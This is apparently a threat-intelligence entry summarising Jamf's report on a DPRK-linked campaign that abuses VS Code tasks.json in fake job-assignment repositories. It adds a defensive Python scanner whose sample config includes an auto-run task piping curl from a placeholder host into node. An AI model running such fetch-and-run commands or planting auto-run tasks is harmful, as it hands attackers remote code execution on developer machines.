Threat Actors Expand Abuse of Microsoft Visual Studio Code

2026-01-20 Jamf

https://www.jamf.com/blog/threat-actors-expand-abuse-of-visual-studio-code/


Jamf Threat Labs describes an evolution of the DPRK-linked Contagious Interview campaign that abuses Microsoft Visual Studio Code task configuration files in malicious GitHub or GitLab repositories. Under recruitment or technical-assignment lures, a victim who opens and trusts the repository in Visual Studio Code can trigger tasks.json commands that launch a shell, fetch a remote JavaScript payload with curl, and pipe it into Node.js on macOS. The JavaScript implant provides host fingerprinting, public IP discovery through ipify.org, command-and-control polling every five seconds, and remote code execution through server-supplied JavaScript. Jamf also observed follow-on JavaScript tasking roughly eight minutes after infection, underscoring how the campaign adapts delivery and execution to normal developer workflows.
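As an added example (not code from the Jamf report or from this page), a small Python check a defender could run over a repository's .vscode/tasks.json before trusting the folder: it flags tasks configured to auto-run when the folder opens (VS Code's runOptions.runOn = "folderOpen") and any command, including the per-platform osx/linux/windows overrides, that pipes curl or wget output straight into an interpreter such as node. The sample tasks.json and its URL are constructed placeholders, not indicators from the report.

```python
import json
import re

# Constructed sample tasks.json for this example (not from the Jamf report);
# the URL is a placeholder, not a real indicator.
SAMPLE_TASKS_JSON = r'''{
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell", "command": "echo ok",
     "osx": {"command": "curl -s https://example.invalid/p.js | node"},
     "runOptions": {"runOn": "folderOpen"}}
  ]
}'''

# A download tool whose output is piped directly into an interpreter.
FETCH_PIPED_TO_INTERPRETER = re.compile(
    r"\b(curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(node|sh|bash|zsh|python3?)\b")

# tasks.json lets a task override command/args per platform under these keys.
PLATFORM_KEYS = ("osx", "linux", "windows")


def command_text(section):
    """Flatten command and args (string, list or {"value": ...} forms) into one string."""
    parts = []
    for item in [section.get("command")] + list(section.get("args", [])):
        if isinstance(item, dict):
            item = item.get("value")
        if isinstance(item, list):
            parts.extend(str(x) for x in item)
        elif item is not None:
            parts.append(str(item))
    return " ".join(parts)


def scan_tasks(tasks_json_text):
    """Return [(label, [reasons])] for tasks that auto-run or pipe a fetch into an interpreter."""
    findings = []
    for task in json.loads(tasks_json_text).get("tasks", []):
        reasons = []
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            reasons.append("auto-runs on folderOpen")
        # Inspect the base command and every per-platform override; a scanner that
        # reads only the top-level "command" would miss an "osx" override.
        sections = [task] + [task[k] for k in PLATFORM_KEYS if isinstance(task.get(k), dict)]
        if any(FETCH_PIPED_TO_INTERPRETER.search(command_text(s)) for s in sections):
            reasons.append("network fetch piped into an interpreter")
        if reasons:
            findings.append((task.get("label", "<unnamed>"), reasons))
    return findings


if __name__ == "__main__":
    for label, reasons in scan_tasks(SAMPLE_TASKS_JSON):
        print(f"{label}: {'; '.join(reasons)}")
```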

Indicators of Compromise

Type Value First Seen Last Seen
HASH 932a67816b10a34d05a2621836cdf7f… 2026-01-20 2026-01-20
